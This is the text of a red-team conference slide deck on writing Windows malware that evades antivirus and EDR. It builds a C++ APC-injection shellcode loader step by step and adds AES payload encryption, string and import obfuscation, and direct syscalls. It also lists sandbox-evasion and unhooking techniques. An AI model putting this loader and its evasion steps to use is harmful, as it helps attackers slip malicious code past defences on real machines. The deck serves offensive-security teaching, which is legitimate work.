Developing High-Impact Malware with Minimal Effort.pptx

Developing High-Impact
Malware with Minimal Effort
Elvin Gentiles
Security Consultant
November 14, 2022

3
▸ ~7 years in IT Security consultancy
▸ Offensive security guy
▸ Into Malware Dev & Windows Internals
▸ CRTE, CRTO, CRTP, OSCE, OSCP, OSWP
captmeelo.com
@CaptMeelo
capt-meelo
/in/elvingentiles
# whoami
©2022 IOActive, Inc. All rights reserved.

4
▸ Why maldev
▸ Primer on Windows APIs
▸ Common types of detection
▸ Considerations
▸ Getting the work done
▸ Tool demo
▸ What’s next
Agenda

6
▸ It is cool and a great skill to learn
▸ Red teams must keep up as blue teams continue to evolve
“To know
your Enemy,
you must
become your
Enemy”
Sun Tzu
Why Malware Development?

7
▸ Malware Development is intimidating
▸ Which language to use?
▸ What techniques to employ?
▸ What APIs to utilize?
▸ How to evade AVs/EDRs?
▸ Will my code work?
▸ How do I even start?
Why This Talk?

9
▸ WinAPI acts as a bridge that allows application to
interact with the operating system
▸ Officially documented on MSDN
▸ Easy to understand and work with
▸ Exported by different DLLs such as user32.dll,
kernel32.dll, etc.
Windows API

10
▸ The functions that perform the actual operation
▸ Every function in WinAPI will eventually call the corresponding function in
the Native API
▸ Undocumented
▸ Challenging to work with (but very useful)
▸ Unofficial documentations
▸ http://undocumented.ntinternals.net/
▸ https://doxygen.reactos.org/index.html
▸ Exported by ntdll.dll or win32u.dll
▸ Distinguishable by the Nt or Zw prefix
▸ Commonly referred as “syscalls”
Native API

11
From WinAPI to Native API

12
Windows API Native API Purpose
OpenProcess NtOpenProcess Opens a handle to a process
VirtualAlloc(Ex) NtAllocateVirtualMemory Allocates memory
VirtualProtect(Ex) NtProtectVirtualMemory
Changes a memory
permission
WriteProcessMemory NtWriteVirtualMemory Writes data into memory
CreateRemoteThread(Ex) NtCreateThread(Ex) Creates a thread
CloseHandle NtClose Closes a handle
Windows & Native API Example

14
Static-based Detection
▸ Compares the signature to a DB of known malwares
(e.g., YARA rules)
▸ strings
▸ variable names
▸ process names
▸ hashes
▸ imports & exports
▸ etc.
▸ Drawback: it only works for known malwares

15
Dynamic-based Detection
▸ Monitors the execution of code in a sandbox
▸ API calls
▸ network traffic
▸ process’ memory
▸ file/folder/registry changes
▸ etc.
▸ Drawback: sandboxes are limited and can be bypassed
(e.g., delaying execution, environmental keying, etc.)

16
Heuristic-based Detection
▸ Looks at how a process behaves then makes decisions
based on evidences and pre-defined/baseline
behavioral rules
▸ Open a handle to a process → allocate memory → write code
into memory → create thread
▸ Drawback: can be evaded by changing the process’
flow/pattern (e.g., A-B-C-D → A-C-D-B)

18
▸ Depends on:
▸ Low- or high-level
▸ Dev’s knowledge and experience
▸ Docs and libraries availability
▸ Popularity and community support
▸ Cross-compilation
Programming Language

19
▸ Different file types for different scenarios
File Types
Executables (.exe)
Dynamic Link Libraries (.dll)
HTML (.hta, .htm, …)
MS Docs (.doc, .xlsm, .ppam, …)
Shortcuts (.lnk)
Disk Image (.iso, .img, …)
Installer (.msi, ...)
Icons from Freepik

20
▸ How your malware should behave
▸ Shellcode loader
▸ Process injection
▸ DLL injection
▸ DLL sideloading
▸ Persistence
Execution Method

21
▸ Executing code in the address space of another process
▸ Could evade detection since execution is masked under
a different process
▸ May allow an attacker to access the target process’
memory, privileges, etc.
▸ If the target process is not running, an attacker can
spawn it
Process Injection

22
Process Injection
GIF from elastic

23
Process Injection Techniques
ATT&CK ID Name
T1055.001 Dynamic-link Library Injection
T1055.002 Portable Executable Injection
T1055.003 Thread Execution Hijacking
T1055.004 Asynchronous Procedure Call
T1055.005 Thread Local Storage
T1055.008 Ptrace System Calls
T1055.009 Proc Memory
T1055.011 Extra Window Memory Injection
T1055.012 Process Hollowing
T1055.013 Process Doppelgänging
T1055.014 VDSO Hijacking
T1055.015 ListPlanting From MITRE

24
▸ Red Team Experiment: Code & Process Injection by Mantvydas Baranauskas
(@spotheplanet)
PoCs

25
▸ GitHub: odzhan/injection by @modexpblog
PoCs

26
▸ GitHub: theevilbit/injection by Csaba Fitzl (@theevilbit)
PoCs

27
▸ GitHub: SafeBreach-Labs/pinjectra by Itzik Kotler (@itzikkotler) & Amit Klein
PoCs

29
▸ By scouring the Internet and the open-source
community
▸ Utilizing “header-only” libraries
How Do We Do It?

31
Skeleton Code
#include <Windows.h>
int main()
{
// msfvenom -p windows/x64/messagebox TEXT="I'm a malware author now" -f c
unsigned char shellcode[] = "xfcx48x81xe4xf0[...SNIP...]x65x42x6fx78x00";
SIZE_T shellcodeSize = sizeof(shellcode);
STARTUPINFO si = { 0 };
PROCESS_INFORMATION pi = { 0 };
CreateProcess(L"C:WindowsSystem32notepad.exe", NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);
LPVOID bufferAddr = VirtualAllocEx(pi.hProcess, NULL, shellcodeSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(pi.hProcess, bufferAddr, shellcode, shellcodeSize, NULL);
QueueUserAPC((PAPCFUNC)bufferAddr, pi.hThread, NULL);
ResumeThread(pi.hThread);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
}

32
Skeleton Code in Action

33
Skeleton Code in Action

35
▸ Adds additional layer of protection by getting rid of
“known indicators”
▸ Applies to shellcode, strings, function calls, etc.
▸ Can be done using different implementations/algorithms
(AES, XOR, RC4, UUID, CLSID, SVG, CSS, CSV,
IPv4/v6, MAC, etc.)
▸ A must!
▸ Beware as too much obfuscation yields higher entropy,
which could be an indicator
Encryption/Obfuscation

37
▸ Shellcodes such as those generated by msfvenom are
heavily signatured
▸ Custom shellcode and/or encryption algorithm is
preferred as it makes detection harder
Shellcode Encryption

38
▸ weidai11/cryptopp
▸ kokke/tiny-AES-c
▸ SergeyBel/AES
▸ kkAyataka/plusaes
▸ kerukuro/digestpp
▸ Soreing/des-cpp-encrypt
▸ amrayn/mine
(Some of the) Available Libraries

39
Tiny-AES-c in Action
Generating Encrypted Shellcode (AES-CBC-256)
#include <stdio.h>
#include "libs/aes.hpp"
int main()
{
unsigned char payload[] = "xfcx48x81xe4xf0[...SNIP...]x65x42x6fx78x00x90";
SIZE_T payloadSize = sizeof(payload);
unsigned char key[] = "Malware.Development.Is.SoAwesome";
unsigned char iv[] = " xccx21xafx90x4dx8axbbx39xacx77x48x64x7dx9cx71xa4";
struct AES_ctx ctx;
AES_init_ctx_iv(&ctx, key, iv);
AES_CBC_encrypt_buffer(&ctx, shellcode, shellcodeSize);
printf("Encrypted buffer:n");
for (int i = 0; i < shellcodeSize - 1; i++) {
printf("x%02x", shellcode[i]);
}
printf("n");
}
NOP (x90) was
appended to make the
shellcode a multiple of
16 bytes.
Ensure the correct
block size!

40
Generated Shellcode (AES-CBC-256)

41
Decrypting Shellcode (AES-CBC-256)
int main()
{
unsigned char shellcode[] = "x31xb4x0fx9cx41[...SNIP...]x69xd9x96x09x08xce";
unsigned char key[] = "Malware.Development.Is.SoAwesome";
unsigned char iv[] = "xccx21xafx90x4dx8axbbx39xacx77x48x64x7dx9cx71xa4";
struct AES_ctx ctx;
AES_CBC_decrypt_buffer(&ctx, shellcode, shellcodeSize);
}
AES_CBC_decrypt_buffer()
is now used.

42
Running the Updated Code

43
Before and After
Unencrypted Encrypted

44
▸ The key and IV are not
obfuscated, which
means the shellcode can
be easily decrypted.
Key/IV Obfuscation

45
Hiding the Key and IV
int main()
{
unsigned char key[] = { 'M', 'a', 'l', 'w', 'a', 'r', 'e', '.', 'D', 'e', 'v', 'e', 'l', 'o', 'p', 'm', 'e', 'n', 't', '.',
'I', 's', '.', 'S', 'o', 'A', 'w', 'e', 's', 'o', 'm', 'e’ };
unsigned char iv[] = { 0xcc, 0x21, 0xaf, 0x90, 0x4d, 0x8a, 0xbb, 0x39, 0xac, 0x77, 0x48, 0x64, 0x7d, 0x9c, 0x71, 0xa4 };
struct AES_ctx ctx;
}
Stack them!

46
Key/IV Obfuscation
Before and After
Unobfuscated Obfuscated

48
▸ Strings are
stored in
cleartext within
the binary.
String Obfuscation

49
▸ skadro-official/skCrypter
▸ JustasMasiulis/xorstr
▸ qis/xorstr
▸ TyrarFox/encstr
▸ adamyaxley/Obfuscate
▸ andrivet/ADVobfuscator

50
skCrypter in Action
#include "libs/aes.hpp”
#include "libs/skCrypter.h"
int main()
{
unsigned char key[] = { 'M', 'a', 'l', 'w', 'a', 'r', 'e', '.', 'D', 'e', 'v', 'e', 'l', 'o', 'p', 'm', 'e', 'n', 't', '.', 'I', 's', '.', 'S', 'o', 'A',
'w', 'e', 's', 'o', 'm', 'e’ };
struct AES_ctx ctx;
CreateProcess(skCrypt(L"C:WindowsSystem32notepad.exe"), NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);
}
String is passed into the
skCrypt() function.

51
String Obfuscation
Before and After
String is visible
String is not visible

53
▸ IAT stores the addresses of functions imported from
DLLs
▸ A combination of specific/malicious WinAPI calls (e.g.,
VirtualAllocEx(), WriteProcessMemory(), etc.)
is a red flag
▸ Direct syscalls can be used but some native APIs, such
as NtCreateUserProcess(), is hard to use
Import Address Table (IAT) Obfuscation

54

55
▸ JustasMasiulis/lazy_importer
▸ AmJayden/Lazy-Importer
▸ SaulBerrenson/WinApiObfuscator

56
lazy_importer in Action
#include "libs/skCrypter.h”
#include "libs/lazy_importer.hpp"
int main()
{
SIZE_T shellcodeSize = sizeof(shellcoade);
unsigned char key[] = { 'M', 'a', 'l', 'w', 'a', 'r', 'e', '.', 'D', 'e', 'v', 'e', 'l', 'o', 'p', 'm', 'e', 'n', 't', '.', 'I', 's', '.', 'S', 'o', 'A', 'w',
'e', 's', 'o', 'm', 'e’ };
struct AES_ctx ctx;
LI_FN(CreateProcessW)(skCrypt(L"C:WindowsSystem32notepad.exe"), nullptr, nullptr, nullptr, FALSE, CREATE_SUSPENDED, nullptr, nullptr, &si, &pi);
LPVOID bufferAddr = LI_FN(VirtualAllocEx)(pi.hProcess, nullptr, shellcodeSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
LI_FN(WriteProcessMemory)(pi.hProcess, bufferAddr, shellcode, shellcodeSize, nullptr);
LI_FN(QueueUserAPC)((PAPCFUNC)bufferAddr, pi.hThread, NULL);
LI_FN(ResumeThread)(pi.hThread);
LI_FN(CloseHandle)(pi.hProcess);
LI_FN(CloseHandle)(pi.hThread);
}
WinAPIs are now passed
into the LI_FN()function.

57
Before and After
WinAPIs used
are visible
WinAPIs used
are not visible

59
▸ Virtual Environment Detection
▸ Hardware resources (CPU, RAM, vendor ID, screen resolution, etc.)
▸ Human-like behavior (mouse movement, recently opened docs, etc.)
▸ Running processes (vmtoolsd.exe, procmon.exe, windbg.exe, etc.)
▸ Environment Keying
▸ Implant will only run in a specific target (e.g., checking the domain name)
▸ Using the environment (e.g., domain name) as decryption key
▸ Timing Attacks
▸ Execution delay (e.g., using Sleep(), NtDelayExecution(), etc.)
▸ And more…
Defeating Sandboxes

60
▸ https://github.com/LordNoteworthy/al-khaser
▸ https://github.com/a0rtega/pafish
▸ https://evasions.checkpoint.com/techniques/timing.html
(Some of the) Available Resources

62
▸ AV/EDR injects its DLL in newly created processes
▸ The DLL “hooks” specific/malicious API calls (exported and/or
unexported)
▸ Hooking is done by replacing the first instructions of the
hooked function with a JMP instruction to a routine inside the
AV/EDR DLL
▸ AV/EDR then analyzes the parameters passed, sequence of
API calls used, etc.
▸ If it identified as malicious, the process will be terminated
▸ Otherwise, execution will jump back to the hooked function
How API Hooking Works

63
How WinAPI Works

64
How API Hooking Works

65
▸ Avoiding the use of hooked APIs
▸ Use uncommon/unsuspicious APIs or functions
▸ Patching the patch
▸ Restore the original instructions that was overwritten by AV/EDR
▸ DLL Unhooking
▸ Replace the DLL (e.g., ntdll.dll)in memory (tampered by
AD/EDR) with a clean copy stored on disk
▸ Direct syscalls
▸ Invoke the API’s corresponding assembly code
Bypassing Userland Hooks

66
▸ JustasMasiulis/inline_syscall
▸ jthuraisamy/SysWhispers2
▸ klezVirus/SysWhispers3
▸ hlldz/RefleXXion

67
inline_syscall in Action
Generating structs and typedefs
$ python3 syswhispers.py -f NtAllocateVirtualMemory,NtWriteVirtualMemory,NtQueueApcThread,NtResumeThread,NtClose -o syscalls
. ,--.
,-. . . ,-. . , , |-. o ,-. ,-. ,-. ,-. ,-. /
`-. | | `-. |/|/ | | | `-. | | |-' | `-. ,-'
`-' `-| `-' ' ' ' ' ' `-' |-' `-' ' `-' `---
/| | @Jackson_T
`-' ' @modexpblog, 2021
SysWhispers2: Why call the kernel when you can whisper?
Complete! Files written to:
syscalls.h
syscalls.c
syscallsstubs.x86.asm
syscallsstubs.x86.nasm
syscallsstubs.x86.s
syscallsstubs.x64.asm
syscallsstubs.x64.nasm
syscallsstubs.x64.s
TIP: Use SysWhispers2 to lessen the burden of getting the correct structs and typedefs.

68
#include "structs/syscalls.h"
#include "libs/skCrypter.h”
#include "libs/lazy_importer.hpp”
#include "libs/in_memory_init.hpp"
int main()
{
jm::init_syscalls_list();
unsigned char key[] = { 'M', 'a', 'l', 'w', 'a', 'r', 'e', '.', 'D', 'e', 'v', 'e', 'l', 'o', 'p', 'm', 'e', 'n', 't', '.', 'I', 's', '.', 'S', 'o', 'A', 'w', 'e', 's', 'o', 'm',
'e’ };
struct AES_ctx ctx;
LI_FN(CreateProcessW)(skCrypt(L"C:WindowsSystem32notepad.exe"), nullptr, nullptr, nullptr, FALSE, CREATE_SUSPENDED, nullptr, nullptr, &si, &pi);
LPVOID bufferAddr = NULL;
INLINE_SYSCALL(NtAllocateVirtualMemory)(pi.hProcess, &bufferAddr, 0, &shellcodeSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
INLINE_SYSCALL(NtWriteVirtualMemory)(pi.hProcess, bufferAddr, &shellcode, shellcodeSize, NULL);
INLINE_SYSCALL(NtQueueApcThread)(pi.hThread, (PKNORMAL_ROUTINE)bufferAddr, bufferAddr, NULL, NULL);
INLINE_SYSCALL(NtResumeThread)(pi.hThread, NULL);
INLINE_SYSCALL(NtClose)(pi.hProcess);
INLINE_SYSCALL(NtClose)(pi.hThread);
}
required
Make sure to use LLVM
(clang-cl) as the
Platform Toolset

69
Running the updated Code
(clang-cl) as the
Platform Toolset

71
▸ Direct syscalls and native API functions (mostly)
▸ Import Address Table (IAT) evasion
▸ Encrypted payload (XOR and AES)
▸ Randomly generated key
▸ Automatic padding (if necessary) of payload with NOPS (x90)
▸ Byte-by-byte in-memory decryption of payload
▸ XOR-encrypted strings
▸ PPID spoofing
▸ Blocking of non-Microsoft-signed DLLs
▸ (Optional) Cloning of PE icon and attributes
▸ (Optional) Code signing with spoofed cert
Features

72
1. Early-bird APC Queue (requires sacrificial process)
2. Thread Hijacking (requires sacrificial process)
3. KernelCallbackTable (requires sacrificial process that has a GUI)
4. Section View Mapping
5. Thread Suspension
6. LineDDA Callback
7. EnumSystemGeoID Callback
8. Fiber Local Storage (FLS) Callback
9. SetTimer
10.Clipboard
Shellcode Execution Methods

73
▸ kokke/tiny-AES-c
▸ skadro-official/skCrypter
▸ JustasMasiulis/lazy_importer
▸ JustasMasiulis/inline_syscall
Libraries Used

75

77
Detection Rate
(clang-cl) as the
Platform Toolset

79
PROs
▸ Will work (most of the time)
right out of the box
▸ Easy to use
▸ Saves a lot of time
▸ Saves you from banging your
head
CONs
▸ Bigger binary due to
unnecessary code
▸ No understanding of what is
happening
▸ Libraries might be signatured
already
Pros & Cons of Using Libraries

81
Keep on Reading

82
Take Courses

83
▸ @C5pider
▸ @kyleavery_
▸ @GeKarantzas
▸ @0xBoku
▸ @trickster012
▸ @s4ntiago_p
▸ @SolomonSklash
▸ @am0nsec
▸ @ilove2pwn_
▸ @ORCA10K
▸ @rad9800
▸ @modexpblog
▸ @peterwintrsmith
▸ @passthehashbrwn
▸ @x86matthew
▸ @namazso
Follow these Folks
(in no particular order)
▸ @__mez0__
▸ @mariuszbit
▸ @VirtualAllocEx
▸ @KlezVirus
▸ @diversenok_zero
▸ @NinjaParanoid
▸ @waldoirc
▸ @cerbersec

84
Join the Game Hacking Community

85
Join the Game Hacking Community

Developing High-Impact Malware with Minimal Effort.pptx

More Related Content

What's hot

Similar to Developing High-Impact Malware with Minimal Effort.pptx

Recently uploaded

Developing High-Impact Malware with Minimal Effort.pptx

Editor's Notes